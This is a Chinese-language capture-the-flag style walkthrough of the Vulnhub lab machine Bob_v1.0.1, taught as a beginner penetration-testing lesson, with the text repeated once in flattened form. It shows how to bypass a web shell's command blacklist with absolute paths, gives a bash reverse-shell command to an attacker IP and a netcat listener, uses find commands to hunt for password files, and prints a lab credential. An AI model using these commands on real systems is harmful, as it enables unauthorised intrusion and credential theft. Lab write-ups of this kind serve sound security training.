vulnhub靶场之Bob_v1.0.1
字数 1363 2025-08-10 20:35:54

Vulnhub靶场Bob_v1.0.1渗透测试教学文档

1. 靶场概述

Bob_v1.0.1是Vulnhub上的一个渗透测试靶场,适合初学者学习基本的渗透测试流程和技术。该靶场包含多种漏洞类型,包括信息泄露、WebShell利用、过滤绕过、权限提升等。

2. 信息收集阶段

2.1 主机与端口扫描

使用工具如nmap进行扫描:

nmap -sV 10.9.44.234

发现开放80端口(HTTP服务),这是主要攻击面。

2.2 Web应用枚举

  1. 手动浏览网站:发现陌生网站,可能是目标
  2. 目录扫描
    • 使用御剑或其他目录扫描工具
    • 发现敏感目录和文件
  3. 信息收集重点
    • Contact Us页面可能包含用户名信息
    • Robots.txt文件可能包含敏感路径
    • 备份文件(.bak)可能泄露源代码

3. 威胁建模

3.1 攻击面分析

  1. SSH服务:可尝试爆破,但效率低
  2. WebShell:发现dev_shell.php,是主要突破口
  3. 过滤机制:存在命令黑名单

3.2 可用攻击路径

  1. 通过WebShell执行命令
  2. 绕过过滤机制建立反弹shell
  3. 通过信息泄露获取凭证

4. WebShell利用

4.1 WebShell基础

WebShell是以asp、php、jsp或cgi等网页文件形式存在的代码执行环境,可用于服务器控制。

4.2 测试WebShell功能

  1. 尝试基本命令:
    • whoami - 成功执行
    • ls, pwd - 被过滤
  2. 发现使用绝对路径可绕过:
    • /bin/ls - 成功执行

4.3 获取黑名单

通过/bin/ls发现备份文件dev_shell.php.bak,查看内容:

$bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");

5. 反弹Shell建立

5.1 反弹Shell原理

反弹Shell是让目标机器主动连接攻击者机器,从而绕过防火墙限制。

5.2 常用反弹Shell方法

  1. 使用netcat(被过滤)
  2. 使用bash:
    bash -i >& /dev/tcp/攻击者IP/端口 0>&1
    
  3. 使用python/perl等脚本

5.3 实际实施

  1. 在攻击机监听端口:
    nc -lvnp 4444
    
  2. 在WebShell执行反弹命令:
    /bin/bash -c 'bash -i >& /dev/tcp/攻击者IP/4444 0>&1'
    

6. 权限提升

6.1 初步信息收集

  1. 查看当前用户:

    id
    

    输出:uid=33(www-data) gid=33(www-data)

  2. 查找敏感文件:

    find / -name "*pass*" -type f 2>/dev/null
    find / -name "*.txt" -type f 2>/dev/null
    

6.2 发现用户目录

  1. 进入/home目录查看用户:
    ls -la /home
    
  2. 发现bob用户目录,查看内容:
    ls -la /home/bob
    
  3. 发现敏感信息:
    • jc wwccbb$ (可能是SSH凭证)
    • 加密信息(使用AES加密)

6.3 解密与提权

  1. 尝试使用收集的凭证登录SSH:
    ssh jc@目标IP
    密码:wwccbb$
    
  2. 如果失败,尝试解密AES加密信息
  3. 发现其他用户凭证:dirk

7. 获取Flag

  1. 找到flag文件:
    find / -name "flag*" -type f 2>/dev/null
    
  2. 通常位于/root或/home/user目录下
  3. 需要root权限才能读取

8. 总结与技巧

8.1 渗透测试流程

  1. 信息收集 → 威胁建模 → 漏洞利用 → 权限提升 → 获取目标

8.2 实用技巧

  1. 使用ls -a查看隐藏文件
  2. 备份文件(.bak)是重要信息源
  3. 绝对路径可绕过命令过滤
  4. 用户目录和配置文件常包含敏感信息

8.3 防御建议

  1. 避免使用弱密码
  2. 限制WebShell功能
  3. 定期检查备份文件
  4. 实施最小权限原则

9. 扩展学习

  1. WebShell详解:WebShell基础详解
  2. 反弹Shell技术:反弹Shell详解

通过本靶场练习,可以掌握基本的Web渗透测试流程和技术要点。

Vulnhub靶场Bob_ v1.0.1渗透测试教学文档 1. 靶场概述 Bob_ v1.0.1是Vulnhub上的一个渗透测试靶场,适合初学者学习基本的渗透测试流程和技术。该靶场包含多种漏洞类型,包括信息泄露、WebShell利用、过滤绕过、权限提升等。 2. 信息收集阶段 2.1 主机与端口扫描 使用工具如nmap进行扫描: 发现开放80端口(HTTP服务),这是主要攻击面。 2.2 Web应用枚举 手动浏览网站 :发现陌生网站,可能是目标 目录扫描 : 使用御剑或其他目录扫描工具 发现敏感目录和文件 信息收集重点 : Contact Us页面可能包含用户名信息 Robots.txt文件可能包含敏感路径 备份文件(.bak)可能泄露源代码 3. 威胁建模 3.1 攻击面分析 SSH服务 :可尝试爆破,但效率低 WebShell :发现dev_ shell.php,是主要突破口 过滤机制 :存在命令黑名单 3.2 可用攻击路径 通过WebShell执行命令 绕过过滤机制建立反弹shell 通过信息泄露获取凭证 4. WebShell利用 4.1 WebShell基础 WebShell是以asp、php、jsp或cgi等网页文件形式存在的代码执行环境,可用于服务器控制。 4.2 测试WebShell功能 尝试基本命令: whoami - 成功执行 ls , pwd - 被过滤 发现使用绝对路径可绕过: /bin/ls - 成功执行 4.3 获取黑名单 通过 /bin/ls 发现备份文件dev_ shell.php.bak,查看内容: 5. 反弹Shell建立 5.1 反弹Shell原理 反弹Shell是让目标机器主动连接攻击者机器,从而绕过防火墙限制。 5.2 常用反弹Shell方法 使用netcat(被过滤) 使用bash: 使用python/perl等脚本 5.3 实际实施 在攻击机监听端口: 在WebShell执行反弹命令: 6. 权限提升 6.1 初步信息收集 查看当前用户: 输出:uid=33(www-data) gid=33(www-data) 查找敏感文件: 6.2 发现用户目录 进入/home目录查看用户: 发现bob用户目录,查看内容: 发现敏感信息: jc wwccbb$ (可能是SSH凭证) 加密信息(使用AES加密) 6.3 解密与提权 尝试使用收集的凭证登录SSH: 如果失败,尝试解密AES加密信息 发现其他用户凭证:dirk 7. 获取Flag 找到flag文件: 通常位于/root或/home/user目录下 需要root权限才能读取 8. 总结与技巧 8.1 渗透测试流程 信息收集 → 威胁建模 → 漏洞利用 → 权限提升 → 获取目标 8.2 实用技巧 使用 ls -a 查看隐藏文件 备份文件(.bak)是重要信息源 绝对路径可绕过命令过滤 用户目录和配置文件常包含敏感信息 8.3 防御建议 避免使用弱密码 限制WebShell功能 定期检查备份文件 实施最小权限原则 9. 扩展学习 WebShell详解: WebShell基础详解 反弹Shell技术: 反弹Shell详解 通过本靶场练习,可以掌握基本的Web渗透测试流程和技术要点。